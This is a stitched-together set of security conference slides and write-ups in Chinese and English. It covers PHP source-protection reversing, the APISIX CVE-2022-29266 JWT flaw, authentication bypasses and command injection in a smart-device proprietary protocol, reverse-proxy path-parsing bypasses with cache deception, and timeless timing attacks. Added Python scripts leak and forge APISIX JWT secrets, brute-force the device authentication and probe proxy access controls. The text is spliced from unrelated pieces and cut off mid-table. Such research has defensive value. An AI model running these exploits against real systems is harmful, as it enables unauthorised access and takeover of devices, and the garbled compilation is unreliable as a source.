\n",Z_STRVAL_P(source_string)); } return old_compile_string(source_string, filename TSRMLS_CC); } PHP_MINIT_FUNCTION(evalhook) { return SUCCESS; } PHP_MSHUTDOWN_FUNCTION(evalhook) { return SUCCESS; } PHP_RINIT_FUNCTION(evalhook) { old_compile_string = zend_compile_string; zend_compile_string = evalhook_compile_string; return SUCCESS; } PHP_RSHUTDOWN_FUNCTION(evalhook) { zend_compile_string = old_compile_string; return SUCCESS; } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 7 成功还原源代码 PHP扩展⽅案 PHP_MINFO_FUNCTION(evalhook) { php_info_print_table_start(); php_info_print_table_row(2, "eval hooking", "enabled"); php_info_print_table_end(); } zend_function_entry evalhook_functions[] = { ZEND_FE_END }; zend_module_entry evalhook_module_entry = { STANDARD_MODULE_HEADER, "evalhook", evalhook_functions, PHP_MINIT(evalhook), PHP_MSHUTDOWN(evalhook), PHP_RINIT(evalhook), PHP_RSHUTDOWN(evalhook), PHP_MINFO(evalhook), "0.0.1-dev", STANDARD_MODULE_PROPERTIES }; ZEND_GET_MODULE(evalhook) 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 8 使⽤php扩展的代码混淆和⽆扩展代码混淆⽐较相似,只不过是把代码还原过程从php代码转到了php扩 展。 同样是使⽤aes des 异或等加密⽅法直接加密php代码,HOOK翻译php的函数在翻译PHP⽂件前对⽂件 进⾏解密操作。这种⽅案也可以完全还原出源代码。在⽆其他混淆和压缩时甚⾄还会保留注释。 典型开源项⽬:php-beast tonyenc screw-plus 这⾥以beast为例. ⾸先在php的扩展⽬录下找到beast.so beast的加密⽅案会把加密key编译进扩展中. 我们只需要寻找key就可以完成解密 beast由于是开源项⽬.有现成的符号表和源码这使得反编译寻找key变得⾮常简单. 但这样有点太简单了. 所以这⾥演示的是在没有源码的情况下使⽤IDA分析解密流程. 
⾸先在导⼊表找到zend_compile_file 这个函数会将php⽂件翻译成opcode 因此⼤部分php加密扩展都需要hook这个函数达到拦截php⽂件载⼊和替换php⽂件的功能 源代码混淆 ⼿⼯解密 9 继续跟⼊ 发现有两个函数 ⼀般在这种php加密扩展设计时会对这个函数有两次操作: ⼀个是在启动时hook 这个函数,⼀个是在停⽌时恢复这个函数。 继续跟⼊启动hook 显然⽂件处理逻辑在cgi_compile_file内 10 跟踪⽂件句柄 decrypt_file函数的参数存在⽂件句柄 所以这个函数应该就是⽂件解密函数 根据代码可以看出beast 加密⽂件的结构 | encrypt_file_header_sign ⽂件头标记(不固定 可修改)| reallen⽂件⻓度 int 4字节 | expire 到期时 间 int 4字节| entype 加密⽅式 int 4字节| 加密后⽂件| 11 分析⽂件头发现该⽂件加密⽅式为 02 跟⼊beast_get_encrypt_algo 2对应的是 aes_handler_ops 12 使⽤了AES 128 ECB加密模式 直接提取key参数内容 ⻓度刚好16位 到这⼀步就成功拿到了加密秘钥 使⽤拿到的KEY就可以解密PHP⽂件 ⾃动化通⽤解密 13 编写php扩展 HOOK zend_compile_file函数 beast的加密不会对php⽂件做额外的操作 解密⽂件与加密前原⽂件完全⼀致 php注释和原格式都会保留 注意: 这⾥扩展加载顺序问题 建议直接修改php源码 Zendzend_language_scanner.c ZEND_API zend_op_array *compile_file php会将源代码翻译成类似汇编的⼆进制中间操作码再交给zend引擎执⾏。 之前的介绍的都是编译之前对php源代码的直接操作。这⾥是对opcode的操作,跳过翻译过程,直接把 现成的opcode交给zend引擎执⾏(不同版本PHP引擎编译出的opcode可能会有兼容性问题)。 这种php代码防护⽅法 只能hook zend_execute 拿到opcode。 不可能直接得到原本的源码,只能通过 反编译尽可能的还原源代码。 ⼤部分商业php保护⽅案都使⽤这种可靠的⽅案为基础 ZendGuard(zend) SourceGuardian(SG) IonCube (IC) Swoole Compiler 上⾯的⽅案有的还对zend引擎进⾏了魔改,使翻译出的opcode只能在修改后的引擎执⾏,进⼀步增强了 安全性。 hook zend_execute 拿到opcode 使⽤对应版本的php操作码反推php代码 太菜了不会反编译) opcode 还原代码 附录 14 phpize ⽣成Makefile 配置编译选项 启⽤扩展 最后执⾏make 编译扩展 编译好的扩展会放在./modules/ ⽬录下 使⽤扩展 可以重复使⽤-d extension 加载多个扩展 PHP扩展编译 Bash 复制代码 docker run -it --rm -v /mnt/hgfs/tmpssd/php-eval-hook/:/ext/ php:5.6 /bin/bash apt-get update apt install libtool 1 2 3 Bash 复制代码 phpize 1 Bash 复制代码 ./configure --enable-evalhook 1 C 复制代码 php -d extension=扩展位置 -f ⽂件 1 15 在选⽤PHP源码保护⽅案时 尽量选择opcode或虚拟机⽅案 源代码混淆类只能对源代码获取和阅读增加⼀点困难 在加密扩展可被攻击者获取到时并不能起到保护作 ⽤ PHP代码审计⼊⻔指南 php内核剖析 从Zend虚拟机分析PHP加密扩展 通⽤加密php⽂件还原⽅法 总结 参考
pdf
APISIX_CVE-2022-29266 Patch https://github.com/apache/apisix/commit/61a48a2524a86f2fada90e8196e147538842db89 jwt jwt-auth consumer JWT Authentication service route consumer cookie jwt-auth HS256 RS256 jwt:load_jwt(token) https://github.com/SkyLothar/lua-resty-jwt/blob/ee1d024071f872e2b5a66eaaf9aeaf86c5bab3ed/lib/resty/jwt.lua#L782 jwt_obj[str_const.reason] = "Decode secret is not a valid cert/public key: " .. (err and err or secret) HS256jwt-authRS256tokenHS256secretkeytoken Payload vulhub https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 openssl genrsa -out private.key openssl rsa -in private.key -pubout -outform PEM -out public.pem consumer jwt-auth RS256 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "username": "jack", "plugins": { "jwt-auth": { "key": "user-key", "public_key": "-----BEGIN PUBLIC KEY-----\n...\n-----END PUBLIC KEY-----", "private_key": "-----BEGIN RSA PRIVATE KEY-----\n...\n-----END RSA PRIVATE KEY-----", "algorithm": "RS256" } } }' Route Service jwt-auth curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "methods": ["GET"], "uri": "/index.html", "plugins": { "jwt-auth": {} }, "upstream": { "type": "roundrobin", "nodes": { "0.0.0.0:80": 1 } } }' RS256Token curl http://127.0.0.1:9080/apisix/plugin/jwt/sign?key=user-key -i consumer jwt-auth HS256 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "username": "jack", "plugins": { "jwt-auth": { "key": "user-key", "secret": "my-secret-key" } } }' Route Service jwt-auth curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "methods": ["GET"], "uri": "/index.html", "plugins": { "jwt-auth": {} }, "upstream": { "type": "roundrobin", "nodes": { "0.0.0.0:80": 1 } } }' RS256tokenHS256HS256secret key curl http://127.0.0.1:9080/index.html?jwt=eyJ4NWMiOlsiLS... -i keyToken https://github.com/apache/apisix/blob/96838b9b47347429d79ba5cc10c3267b8c62bee9/docs/zh/latest/plugins/jwt-auth.md https://www.bookstack.cn/read/apache-apisix-1.4.1-zh/9ec65217dcf67be9.md https://github.com/apache/apisix/blob/master/apisix/plugins/jwt-auth.lua https://github.com/apache/apisix/commit/61a48a2524a86f2fada90e8196e147538842db89 https://github.com/SkyLothar/lua-resty-jwt/blob/ee1d024071f872e2b5a66eaaf9aeaf86c5bab3ed/lib/resty/jwt.lua#L782
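Not part of the original write-up - a rough Python sketch of the probe flow described above: sign an RS256 token with a throwaway RSA key, send it to a route whose consumer is configured for HS256, extract the secret that leaks through the lua-resty-jwt error message, then forge a valid HS256 token. The claim names ("key", "exp"), the target URL, the consumer key and the error-matching regex are assumptions/placeholders; PyJWT, cryptography and requests are required.

import re, time, jwt, requests
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization

TARGET = 'http://127.0.0.1:9080/index.html'   # route protected by jwt-auth
CONSUMER_KEY = 'user-key'                      # "key" of the HS256 consumer

# throwaway RSA key - only needed so the probe token parses as RS256
priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pem = priv.private_bytes(serialization.Encoding.PEM,
                         serialization.PrivateFormat.PKCS8,
                         serialization.NoEncryption())

claims = {'key': CONSUMER_KEY, 'exp': int(time.time()) + 3600}
probe = jwt.encode(claims, pem, algorithm='RS256')

resp = requests.get(TARGET, params={'jwt': probe})
m = re.search(r'not a valid cert/public key: ([^"\\]+)', resp.text)
if m:
    secret = m.group(1)
    forged = jwt.encode(claims, secret, algorithm='HS256')
    print('leaked secret:', secret)
    print('forged token :', forged)
else:
    print('no secret in response:', resp.status_code, resp.text[:200])

This mirrors the vulhub walkthrough above but skips standing up a second APISIX instance just to mint the RS256 probe token.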
pdf
从 后 门 到 漏 洞 — — 智 能 设 备 私 有 协 议 中 的 安 全 问 题 魏凡 绿盟科技 格物实验室 安全研究员 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 智能设备中的私有协议 私有协议一般来说指未文档化的协议,格式未知,一般具有以下特点: ⚫ 从功能上来讲,一般用于运维管理/服务发现等功能 ⚫ 一般监听于TCP/UDP的大端口 ⚫ 多数作为服务端,部分可以在厂商官网找到协议的客户端 私有协议的格式未知,所以逆向分析较难,因此公开的漏洞较少,但一出现安全问题,一般 影响都较为严重。 私有协议的安全问题 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结 目录 header 魔数 版本号 操作码 长度域 校验和 … body 长度域 数据部分 … 可能存在header+body的嵌套 私有协议的一般格式 协议“入口点”(网络通信函数): recv/send,recvfrom/sendto, recvmsg/sendmsg 协议分析——“入口点” 还有一些容易忽略的地方: ⚫ 有些采用ssl连接,ssl_read/ssl_write ⚫ recv也可用于接收udp的数据包,recvfrom也可用于接收tcp数据包 ⚫ 有时候通信函数在应用的调用库中 调试与调试权限获取 获取调试权限的一般思路: ⚫ 利用设备自带的TELNET/SSH功能 ⚫ 利用设备硬件调试接口 ⚫ 修改设备固件增加调试后门 ⚫ 利用设备的已知漏洞 ⚫ 利用设备的未知漏洞 准备静态编译的小工具,比较常用的有 busybox, gdbserver和tcpdump “拿到设备的调试权限,整个漏洞挖掘工作就成功了一半” ——来自某不知名研究员 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 本议题所提到的漏洞均已送报厂商并已修复 一个偶然的机会,我们拿到了一个某厂商生产的智能设备,其某个TCP端口使用了一个私 有协议,该协议未文档化,官网也未提供任何管理客户端。 ⚫ CyaSSL_read ⚫ 单向认证 某厂商智能设备私有协议分析 ⚫ 找到协议“入口点” ⚫ 跟踪数据流向 ⚫ 逆向分析 常规漏洞挖掘思路 主观考虑智能设备的常见协议:UPNP协议——接口的命令注入 MQTT协议——未授权访问 非常规的私有协议漏洞挖掘思路 协议“脆弱点”——容易出现漏洞的地方 非常规思路:以发现漏洞为导向,暂时不考虑格式,先了解其功能,然后对其“脆弱点”进 行重点突破。 协议提供的功能 reboot restorefactory 协议认证逻辑 取某个全局变量作为初始字符串,将该字符串进过三次处理,最后和用户传入的一个串进行比较。 第一次处理,和两个特殊字符 串进行移位混淆;后续两次处理都 是标准md5运算。 通过md5算法中的4个链接变量来识别 协议认证逻辑分析 假设作为初始字符串的全局变量为“admin”,将利用如下算法进行处理: (1)取“admin”字符串,和两个固定字符串一起参与移位混淆操作,得到新字符串; (2)将第一次变换得到的新字符串进行标准md5运算,得到hash值 “\x21\x23\x2f\x29\x7a\x57\xa5\xa7\x43\x89\x4a\x0e\x4a\x80\x1f\xc3”; (3)将第二次得到的hash值再次进行标准md5运算,得到hash值 “\x43\x44\x26\x76\xc7\x4a\xe5\x9f\x21\x9c\x2d\x87\xfd\x6b\xad\x52” 将最后得到的hash值与用户传入进行比较,若相等则认证成功。 在调用认证函数之前,有个函数将会给该全局变量赋值。 是有趣的是,这里将固定字符串“admin”拷贝到全局变量处。 初始字符串的赋值 运维“后门” 传入固定字符串“admin”经过三次变换后的凭证 “\x43\x44\x26\x76\xc7\x4a\xe5\x9f\x21\x9c\x2d\x87\xfd\x6b\xad\x52” 即可完成认证过程,控制设备重启/恢复出厂设置。 用户:我忘了设备的管理密码了,怎么办? 厂商:IP告诉我一下,我给你远程重置一下。 用户:666啊! 协议的专利 功能: ⚫ 修改配置 ⚫ 重启 ⚫ 恢复出厂设置 ⚫ 固件更新 专利所有权厂商的第一类设备 从配置文件中读取web管理员密码作为原始字符串。 初始字符串的获取 md5_digest(output, input, len) 运算长度len不能为0,如果为0,直接返回 ⚫ 传入md5_digest函数的长度参数为用户控制,可设置为0 ⚫ 没有验证md5_digest函数的返回值,直接将结果用于memcmp进行比较 ⚫ 参与memcmp的第一个参数被初始化为空 ⚫ 控制长度参数为0+凭据为空值(16个\x00)的请求包,即可绕过认证 认证绕过 固件更新处的命令注入,tftp命令中的“文件名”参数为用户传入: 结合前面的认证绕过,达到未授权执行任意命令。 未授权RCE ⚫ 功能上和第一类设备类似 ⚫ UCI读取WEB管理员密码作为初始字符串 专利所有权厂商的第二类设备 ⚫ 传入的长度为用户控制,可以为0 ⚫ md5_digest算法中未验证传入的长度参数 ⚫ 对于标准md5算法来说,当传入md5_update函数的长度参数为0时,无论传入的原始字符串为 何值,生成的hash永远为固定的串“d41d8cd98f00b204e9800998ecf8427e” 认证绕过 还是按照之前的认证算法进行运算,第二次参与md5运算的长度可控。 专利所有权厂商的第三类设备 在md5_digest函数中,对参与md5运算的长度做了判断,不能为0 md5_digest函数对长度的限制 ⚫ 考虑把参与md5_digest运算的长度设为1,则只有一个字节参与md5运算; ⚫ 参与运算的值为0x00-0xff,生成的hash值也有256种情况; ⚫ 协议并未限制最大尝试次数,可无限次发送认证请求。 认证逻辑绕过 生成“密码”字典 构造数据包 发送到设备端 根据返回值判断是否认证成功 实现任意控制设备 控制长度为1 遍历256个md5 hash 认证绕过实现 同一厂商生产的不同类型的设备,针对私有协议的实现上,往往会出现相似的“脆弱点”。 小结 md5_digest函数: ⚫ 不验证返回值 ⚫ 不验证传入长度 ⚫ 验证了,好像又没有验证 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 总结与建议 总结——警惕私有协议“供应链”漏洞 后续的研究中,我们发现存在其他厂商也在使用该协议,和传统的出现在SDK上的供应链漏洞相 比,这些漏洞更加“隐蔽”和难以修复。 给厂商和开发人员的建议——协议设计和实现上尽量用白名单的思想。 谢 谢
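Not from the slides themselves - a small Python sketch of the 256-candidate brute force described for the third device family. The wire format of the proprietary protocol is not public, so build_auth_packet() is only a stand-in for whatever framing and length field (forced to 1) the real client uses; only the candidate generation reflects the talk.

import hashlib, socket

def candidates():
    # with the length parameter forced to 1, only the first byte of the
    # intermediate value is hashed, so at most 256 digests are possible
    for b in range(256):
        yield hashlib.md5(bytes([b])).digest()

def build_auth_packet(digest):
    # placeholder framing: the real packet carries an opcode, the length
    # field set to 1, and the 16-byte digest in the device's own layout
    return b'\x01' + b'\x01\x00\x00\x00' + digest

def try_all(host, port):
    for digest in candidates():
        with socket.create_connection((host, port), timeout=5) as s:
            s.sendall(build_auth_packet(digest))
            reply = s.recv(1024)
            if reply and reply[:1] == b'\x00':   # hypothetical "auth OK" status byte
                return digest
    return None

print(try_all('192.0.2.1', 9999))

Because the protocol does not cap authentication attempts, 256 tries are enough to hit the digest the server computed, after which the reboot / restore-factory / configuration commands are accepted.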
pdf
Reverse proxies & Inconsistency Aleksei "GreenDog" Tiurin About me • Web security fun • Security researcher at Acunetix • Pentester • Co-organizer Defcon Russia 7812 • @antyurin "Reverse proxy" - Reverse proxy - Load balancer - Cache proxy - … - Back-end/Origin "Reverse proxy" URL http://www.site.com/long/path/here.php?query=111#fragment http://www.site.com/long/path;a=1?query=111#fragment + path parameters Parsing GET /long/path/here.php?query=111 HTTP/1.1 GET /long/path/here.php?query=111#fragment HTTP/1.1 GET anything_here HTTP/1.1 GET /index.php[0x..] HTTP/1.1 URL encoding % + two hexadecimal digits a -> %61 A -> %41 . -> %2e / -> %2f Path normalization /long/../path/here -> /path/here /long/./path/here -> /long/path/here /long//path/here -> /long//path/here -> /long/path/here /long/path/here/.. -> /long/path/ -> /long/path/here/.. Inconsistency - web server - language - framework - reverse proxy - … - + various configurations /images/1.jpg/..//../2.jpg -> /2.jpg (Nginx) -> /images/2.jpg (Apache) Reverse proxy - apply rule after preprocessing? /path1/ == /Path1/ == /p%61th1/ - send processed request or initial? /p%61th1/ -> /path1/ Reverse proxy Request - Route to endpoint /app/ - Rewrite path/query - Deny access - Headers modification - ... Response - Cache - Headers modification - Body modification - ... Location(path)-based Server side attacks We can send it: GET //test/../%2e%2e%2f<>.JpG?a1=”&?z#/admin/ HTTP/1.1 Host: victim.com Client side attacks <img src=”//test/../%2e%2e%2f<>.JpG?a1=”&?z#/admin/”> GET //..%2f%3C%3E.jpg?a1=%22&?z HTTP/1.1 Host: victim.com - Browser parses, decodes and normalizes. - Differences between browsers - Doesn’t normalize %2f (/..%2f -> /..%2f) - <> " ' - URL-encoded - Multiple ? in query Possible attacks Server-side attacks: - Bypassing restriction (403 for /app/) - Misrouting/Access to other places (/app/..;/another/path/) Client-side attacks: - Misusing features (cache) - Misusing headers modification Nginx - urldecodes/normalizes/applies - /path/.. -> / - doesn’t know path-params /path;/ - //// -> / - Location - case-sensitive - # treated as fragment Nginx as rev proxy. C1 - Configuration 1. With trailing slash location / { proxy_pass http://origin_server/; } - resends control characters and >0x80 as is - resends processed - URL-encodes path again - doesn’t encode ' " <> XSS? - Browser sends: http://victim.com/path/%3C%22xss_here%22%3E/ - Nginx (reverse proxy) sends to Origin server: http://victim.com/path/<”xss_here”>/ Nginx as rev proxy. C2 - Configuration 2. Without trailing slash location / { proxy_pass http://origin_server; } - urldecodes/normalizes/applies, - but sends unprocessed path Nginx + Weblogic - # is an ordinary symbol for Weblogic Block URL: location /Login.jsp GET /#/../Login.jsp HTTP/1.1 Nginx: / (after parsing), but sends /#/../Login.jsp Weblogic: /Login.jsp (after normalization) Nginx + Weblogic - Weblogic knows about path-parameters (;) - there is no path after (;) (unlike Tomcat’s /path;/../path2) location /to_app { proxy_pass http://weblogic; } /any_path;/../to_app Nginx:/to_app (normalization), but sends /any_path;/../to_app Weblogic: /any_path (after parsing) Nginx. 
Wrong config - Location is interpreted as a prefix match - Path after location concatenates with proxy_pass - Similar to alias trick location /to_app { proxy_pass http://server/app/; } /to_app../other_path Nginx: /to_app../ Origin: /app/../other_path Apache - urldecodes/normalizes/applies - doesn’t know path-params /path;/ - Location - case-sensitive - %, # - 400 - %2f - 404 (AllowEncodedSlashes Off) - ///path/ -> /path/, but /path1//../path2 -> /path1/path2 - /path/.. -> / - resends processed Apache as rev proxy. C1 - Configurations: ProxyPass /path/ http://origin_server/ <Location /path/> ProxyPass http://origin_server/ </Location> - resends processed - urlencodes path again - doesn’t encode ' Apache and // - <Location "/path"> and ProxyPass /path includes: - /path, /path/, /path/anything - //path////anything Apache and rewrite RewriteCond %{REQUEST_URI} ^/protected/area [NC] RewriteRule ^.*$ - [F,L] No access? Bypasses: /aaa/..//protected/area -> //protected/area /protected//./area -> /protected//area /Protected/Area -> /Protected/Area The same for <LocationMatch "^/protected/"> Apache and rewrite RewriteEngine On RewriteRule /lala/(path) http://origin_server/$1 [P,L] - resends processed - something is broken - %3f -> ? - /%2e%2e -> /.. (without normalization) Apache and rewrite RewriteEngine On RewriteCond "%{REQUEST_URI}" ".*\.gif$" RewriteRule "/(.*)" "http://origin/$1" [P,L] Proxy only gif? /admin.php%3F.gif Apache: /admin.php%3F.gif After Apache: /admin.php?.gif Nginx + Apache location /protected/ { deny all; return 403; } + proxy_pass http://apache (no trailing slash) /protected//../ Nginx: / Apache: /protected/ Varnish - no preprocessing (parsing, urldecoding, normalization) - resends unprocessed request - allows weird stuff: GET !i<@>?lala=#anything HTTP/1.1 - req.url is unparsed path+query - case-sensitive Varnish Misrouting: if (req.http.host == "sport.example.com") { set req.http.host = "example.com"; set req.url = "/sport" + req.url; } Bypass: GET /../admin/ HTTP/1.1 Host: sport.example.com Varnish if(req.method == "POST" || req.url ~ "^/wp-login.php" || req.url ~ "^/wp-admin") { return(synth(503)); } No access?? PoST /wp-login%2ephp HTTP/1.1 Apache+PHP: PoST == POST Haproxy/nuster - no preprocessing (parsing, urldecoding, normalization) - resends unprocessed request - allows weird stuff: GET !i<@>?lala=#anything HTTP/1.1 - path_* is path (everything before ? ) - case-sensitive Haproxy/nuster acl restricted_page path_beg /admin block if restricted_page !network_allowed path_beg includes /admin* No access? Bypasses: /%61dmin Haproxy/nuster acl restricted_page path_beg,url_dec /admin block if restricted_page !network_allowed url_dec urldecodes path No access? url_dec sploils path_beg path_beg includes only /admin Bypass: /admin/ Varnish or Haproxy Host check bypass: if (req.http.host == "safe.example.com" ) { set req.backend_hint = foo; } Only "safe.example.com" value? 
Bypass using (malformed) Absolute-URI: GET httpcococo://unsafe-value/path/ HTTP/1.1 Host: safe.example.com Varnish GET httpcoco://unsafe-value/path/ HTTP/1.1 Host: safe.example.com Varnish: safe.example.com, resends whole request Web-server(Nginx, Apache, …): unsafe-value - Most web-server supports and parses Absolute-URI - Absolute-URI has higher priority that Host header - Varnish understands only http:// as Absolute-URI - Any text in scheme (Nginx, Apache) tratata://unsafe-value/ Client Side attacks If proxy changes response/uses features for specific paths, an attacker can misuse it due to inconsistency of parsing of web-server and reverse proxy server. Misusing headers modification location /iframe_safe/ { proxy_pass http://origin/iframe_safe/; proxy_hide_header "X-Frame-Options"; } location / { proxy_pass http://origin/; } - only /iframe_safe/ path is allowed to be framed - Tomcat sets X-Frame-Options deny automatically Misusing headers modification Nginx + Tomcat: <iframe src=”http://victim/iframe_safe/..;/any_other_path”> Browser: http://victim/iframe_safe/..;/any_other_path Nginx: http://victim/iframe_safe/..;/any_other_path Tomat: http://victim/any_other_path Misusing headers modification location /api_cors/ { proxy_pass http://origin; if ($request_method ~* "(OPTIONS|GET|POST)") { add_header Access-Control-Allow-Origin $http_origin; add_header "Access-Control-Allow-Credentials" "true"; add_header "Access-Control-Allow-Methods" "GET, POST"; } - Quite insecure, but - if http://origin/api_cors/ requires token for interaction Misusing headers modification Attacker’s site: fetch("http://victim.com/api_cors%2f%2e%2e"... fetch("http://victim.com/any_path;/../api_cors/"... fetch("http://victim.com/api_cors/..;/any_path"... ... Nginx: /api_cors/ Origin: something else (depending on implementation) Caching - Who is caching? browsers, proxy... - Cache-Control in response (Expires) - controls what and where and for how long a response can be cached - frameworks sets automatically (but not always!) - public, private, no-cache (no-store) - max-age, ... - Cache-Control: no-cache, no-store, must-revalidate - Cache-Control: public, max-age=31536000 - Cache-Control in request - Nobody cares? :) Implementation - Only GET - Key: Host header + unprocessed path/query - Nginx: Cache-Control, Set-Cookie - Varnish: No Cookies, Cache-Control, Set-Cookie - Nuster(Haproxy): everything? - CloudFlare: Cache-Control, Set-Cookie, extension-based(before ?) - /path/index.php/.jpeg - OK - /path/index.jsp;.jpeg - OK Aggressive caching - When Cache-Control check is turned off - *or CC is set incorrectly by web application (custom session?) Misusing cache - Web cache deception - https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cac he-Deception-Attack.pdf - Force a reverse proxy to cache a victim’s response from origin server - Steal user’s info - Cache poisoning - https://portswigger.net/blog/practical-web-cache-poisoning - Force a reverse proxy to cache attacker’s response with malicious data, which the attacker then can use on other users - XSS other users Misusing cache - What if Aggressive cache is set for specific path /images/? 
- Web cache deception - Cache poisoning with session Path-based Web cache deception location /images { proxy_cache my_cache; proxy_pass http://origin; proxy_cache_valid 200 302 60m; proxy_ignore_headers Cache-Control Expires; } Web cache deception: - Victim: <img src=”http://victim.com/images/..;/index.jsp”> - Attacker: GET /images/..;/index.jsp HTTP/1.1 Cache poisoning with session nuster cache on nuster rule img ttl 1d if { path_beg /img/ } Cache poisoning with session: - Web app has a self-XSS in /account/attacker/ - Attacker sends /img/..%2faccount/attacker/ - Nuster caches response with XSS - Victims opens /img/..%2faccount/attacker/ and gets XSS Varnish sub vcl_recv { if (req.url ~ "\.(gif|jpg|jpeg|swf|css|js)(\?.*|)$") { set req.http.Cookie-Backup = req.http.Cookie; unset req.http.Cookie; } sub vcl_hash { if (req.http.Cookie-Backup) { set req.http.Cookie = req.http.Cookie-Backup; unset req.http.Cookie-Backup; } Varnish sub vcl_backend_response { if (bereq.url ~ "\.(gif|jpg|jpeg|swf|css|js)(\?.*)$") { set beresp.ttl = 5d; unset beresp.http.Cache-Control; } Varnish if (bereq.url ~ "\.(gif|jpg|jpeg|swf|css|js)(\?.*)$") { Web cache deception: <img src=”http://victim.com/admin.php?q=1&.jpeg?xxx”> Cache poisoning: - /account/attacker/?.jpeg?xxx - Known implementations - Headers: - CF-Cache-Status: HIT (MISS) - X-Cache-Status: HIT (MISS) - X-Cache: HIT (MISS) - Age: \d+ - X-Varnish: \d+ \d+ - Changing values in headers/body - Various behaviour for cached/passed (If-Range, If-Match, …) What is cached? Conclusion - Inconsistency between reverse proxies and web servers - Get more access/bypass restrictions - Misuse reverse proxies for client-side attacks - Everything is trickier in more complex systems - Checked implementations: https://github.com/GrrrDog/weird_proxies THANKS FOR ATTENTION @author @antyurin
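Not part of the slides - a small raw-socket probe, in the spirit of the bypasses above, for comparing how a proxy/back-end pair treats un-normalized paths. High-level HTTP clients tend to re-encode or normalize the request path, so the request line is written by hand; host, port and the path list are placeholders to adapt to the target.

import socket, ssl

HOST, PORT, USE_TLS = 'victim.example', 443, True

PAYLOADS = [
    '/protected/area',              # baseline, expected to be blocked
    '/aaa/..//protected/area',
    '/protected//./area',
    '/Protected/Area',
    '/%61dmin',
    '/to_app;/../protected/area',
    '/#/../protected/area',
]

def probe(path):
    sock = socket.create_connection((HOST, PORT), timeout=10)
    if USE_TLS:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=HOST)
    sock.sendall(('GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' % (path, HOST)).encode())
    status_line = sock.recv(128).split(b'\r\n')[0].decode('latin-1')
    sock.close()
    return status_line

for p in PAYLOADS:
    print('%-30s -> %s' % (p, probe(p)))

Differences between the baseline and any mangled variant (403 vs 200, missing X-Frame-Options, a cache HIT on a dynamic page) are exactly the inconsistencies the talk abuses.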
pdf
Timeless Timing Attacks
 by Tom Van Goethem & Mathy Vanhoef Hello! Tom Van Goethem Researcher at DistriNet - 
 KU Leuven, Belgium Fanatic web & network
security enthusiast Exploiter of side-channel attacks in browsers & the Web platform Mathy Vanhoef Postdoctoral Researcher at 
 NYU Abu Dhabi
Soon: professor at KU Leuven Interested in Wi-Fi security, software security and applied crypto Discovered KRACK attacks against WPA2, RC4 NOMORE

Timing attacks…

if secret condition:
    do_something()
# continue

for el in arr:
    if check_secret_property(el):
        break

if len(arr_with_secret_elements) > 0:
    do_something()

Remote Timing Attacks
• Step 1: attacker connects to target server
• Step 2: attacker sends a (large) number of requests to the server
• Step 3: for each request attacker measures time it takes to receive a response
• Step 4: attacker compares timing of 2 sets of requests (baseline vs target)
• Step 5: using statistical analysis, it is determined which request took longer
• Step 6: SUCCESS?

Remote Timing Attacks Success
• Performance of timing attacks is influenced by different aspects:
• Network connection between attacker and server
• higher jitter → worse performance
• attacker could try to move closer to target, e.g. same cloud provider
• Jitter is present on both upstream and downstream path
• Size of timing leak determines if attack can be successful
• Timing difference of 50ms is easier to detect than 5µs
• Number of measurements (more → better performance)

[Sequence diagrams: the attacker sends requests to the server one after another and timestamps each response (00:03:27, 00:04:48, ...) to compare round-trip times]

Number of requests required to determine
 timing difference (5-50µs) with 95% accuracy based on measurements between university network and AWS
imposed maximum: 100,000

          EU       US       Asia
50µs      333      4,492    7,386
20µs      2,926    16,820   -
10µs      23,220   -        -
5µs       -        -        -

Timeless Timing Attacks

Timeless Timing Attacks • Absolute response timing is unreliable, as it will always include
 jitter for every request • Let’s get rid of the notion of time (hence timeless) • Instead of relying on sequential timing measurements, 
 we can exploit concurrency and only consider response order
=> no absolute timing measurements!! • Timeless timing attacks are unaffected by network jitter

[Sequence diagrams: two requests leave the attacker together, are processed concurrently by the server, and only the order in which the responses return is observed]

Timeless Timing Attacks:
 Requirements 1. Requests need to arrive at the same time at the server 2. Server needs to process requests concurrently 3. Response order needs to reflect difference in execution time Requirement #1: simultaneous arrival • Two options: multiplexing or encapsulation • Multiplexing: • Needs to be supported by the protocol (e.g. HTTP/2 and HTTP/3 enable
 multiplexing, HTTP/1.1 does not) • A single packet can carry multiple requests that will be processed
 concurrently • Encapsulation: • Another network protocol is responsible for encapsulating multiple streams
 (e.g. HTTP/1.1 over Tor or VPN) HEADERS GET /a HEADERS GET /b 1 TCP packet HTTP/2
 (multiplexing) HTTP/1.1 + Tor
 (encapsulation) GET /a GET /b TCP src: 45212 TCP src: 45214 Tor cell 1 Tor cell 2 1 TCP packet Requirement #2: concurrent execution • Application-dependent; most can be executed in parallel
 possible exception: crypto operations that rely on sequential operations Requirement #3: response order • Most operations will generate response immediately after processing • On TLS connections, response is decrypted in same order as it was
 encrypted on the server.
TCP sequence numbers or (relative) TCP timestamps can also be used

How many requests/pairs are needed?

Sequential Timing Attacks
               EU       US       Asia    LAN    localhost
